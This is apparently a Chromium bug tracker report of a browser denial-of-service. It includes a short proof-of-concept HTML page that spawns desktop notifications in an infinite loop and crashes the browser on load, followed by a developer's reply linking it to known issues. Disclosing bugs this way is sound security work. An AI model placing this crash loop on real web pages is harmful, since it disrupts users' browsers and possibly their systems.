Issue metadata
Sign in to add a comment
|
Notification DoS Vulnerability...
Reported by
win2000...@gmail.com,
Jun 14 2017
|
||||||||||||||||||||||||
Issue description
UserAgent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36
Steps to reproduce the problem:
I slightly modified/altered a code that spawns an example notification by adding a loop. This caused Chromium to crash instantly upon loading the PoC page.
PoC (Notify-Loop.htm):
<script>
// request permission on page load
document.addEventListener('DOMContentLoaded', function () {
if (!Notification) {
alert('Desktop notifications not available in your browser. Try Chromium.');
return;
}
if (Notification.permission !== "granted")
Notification.requestPermission();
});
function notifyMe() {
if (Notification.permission !== "granted")
Notification.requestPermission();
else {
var notification = new Notification('Notification title', {
icon: 'http://cdn.sstatic.net/stackexchange/img/logos/so/so-icon.png',
body: "Hey there! You've been notified!",
});
notification.onclick = function () {
window.open("https://stackoverflow.com/questions/2271156/chrome-desktop-notification-example");
};
}
}
for(;;){
notifyMe();
}
</script>
Source for the unaltered unlooped notification example:
https://stackoverflow.com/questions/2271156/chrome-desktop-notification-example
What is the expected behavior?
What is the expected behavior?:
The Browser will lag out until it crashes.
What went wrong?
What went wrong?:
Chromium should disallow spawning more then one notification at a time, because this can be used to overload the browser, or maybe even the whole OS if the notifications will be immediately displayed on the desktop instead of asking for permission in the browser before.
Did this work before? N/A
Chrome version: 58.0.3029.110 Channel: stable
OS Version: 6.1 (Windows 7, Windows Server 2008 R2)
Flash Version:
Any version of Google Chrome or other Chromium based browsers can be crashed by spawning infinite desktop notifications. This should not happen, because it can be used maliciously if code doing this is hosted on public websites.
,
Jun 19 2017
,
Jun 19 2017
Thank you for the report! This effectively is both Issue 677057 (requesting permission) and Issue 462196 (displaying notifications). There's definitely clever things we can and should do here, such as queuing and coalescing requests in the renderer process, we just haven't been able to prioritize it accordingly yet. |
|||||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||||
Comment 1 by chrishtr@chromium.org
, Jun 15 2017Components: -Blink UI>Notifications